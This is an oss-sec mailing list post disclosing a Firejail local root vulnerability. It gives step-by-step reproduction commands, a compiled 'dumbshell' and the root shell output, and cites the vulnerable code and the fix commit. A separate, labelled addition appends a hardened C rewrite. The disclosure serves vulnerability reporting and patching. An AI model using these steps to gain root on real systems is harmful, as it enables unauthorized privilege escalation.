oss-sec mailing list archives
Re: Re: Firejail local root exploit
From: Martin Carpenter <mcarpenter () free fr>
Date: Sat, 07 Jan 2017 12:13:28 +0100
On Thu, 2017-01-05 at 23:37 +0100, Martin Carpenter wrote:
A handful of concrete examples that I have reported are below.
Another (new) one: MITRE can you please assign a CVE?

6. Root shell via --bandwidth and --shell

Reported at:
https://github.com/netblue30/firejail/issues/1023

Fixed at:
commit 5d43fdcd215203868d440ffc42036f5f5ffc89fc
Author: netblue30 <netblue30 () yahoo com>
Date: Fri Jan 6 22:45:11 2017 -0500

    security fix

Quoting for list:

----8<----
[Against current HEAD, commit 64355]

In a first window run:

$ firejail --noprofile --name=x --net=eth0

In a second window, firstly create a dumb shell that ignores -c:

$ echo 'int main() {system("/bin/sh");}' | gcc -xc -o dumbshell -

and then secondly invoke that shell via the --shell and --bandwidth
flags to obtain root:

$ firejail --shell=./dumbshell --bandwidth=x status
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),125(vboxusers),2000(wiki),10000(martin) context=system_u:system_r:initrc_t:s0

Error occurs at
https://github.com/netblue30/firejail/blob/6435525696e8eda2d1bc0ef50488523422b9126d/src/firejail/bandwidth.c#L445-L451

    char *arg[4];
    arg[0] = cfg.shell;
    arg[1] = "-c";
    arg[2] = cmd;
    arg[3] = NULL;
    clearenv();
    execvp(arg[0], arg);

I don't see any good reason to permit a user-specified shell to run a
bandwidth command.
----8<----
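A hardened form of the quoted exec pattern, added here as an example (it is not part of the original post and not firejail's actual fix): the interpreter is a fixed absolute path, the user-supplied shell is ignored, and `execve` is used so no PATH search happens. The names `HELPER_SHELL`, `build_helper_argv` and `run_helper` are hypothetical, and the sketch assumes `/bin/sh` is sufficient for the helper command.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Assumption: a fixed, root-owned interpreter is enough for the helper. */
#define HELPER_SHELL "/bin/sh"

/* Fill argv for the privileged helper. user_shell (the --shell value) is
 * accepted only to show that it is deliberately not used as argv[0]. */
void build_helper_argv(const char *user_shell, char *cmd, char *argv[4])
{
    (void)user_shell;          /* the quoted code used cfg.shell here */
    argv[0] = HELPER_SHELL;
    argv[1] = "-c";
    argv[2] = cmd;
    argv[3] = NULL;
}

/* Run cmd in a child process; return its exit status, or -1 on failure. */
int run_helper(const char *user_shell, char *cmd)
{
    char *argv[4];
    char *const envp[] = { NULL };  /* empty environment, like clearenv() */
    int status;

    build_helper_argv(user_shell, cmd, argv);
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);  /* absolute path, no PATH lookup */
        _exit(127);                   /* reached only if exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed input: a --shell value like the one in the report. */
    char cmd[] = "exit 7";
    int rc = run_helper("./dumbshell", cmd);
    printf("helper exit status: %d\n", rc);
    return rc == 7 ? 0 : 1;
}
```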